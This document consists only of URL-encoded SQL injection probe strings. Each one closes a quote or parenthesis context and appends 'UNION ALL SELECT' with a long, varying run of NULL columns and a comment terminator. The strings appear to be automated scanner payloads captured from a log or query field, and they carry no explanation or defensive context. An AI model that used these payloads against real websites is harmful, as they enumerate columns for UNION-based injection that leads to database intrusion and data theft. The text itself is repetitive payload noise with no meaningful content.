foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 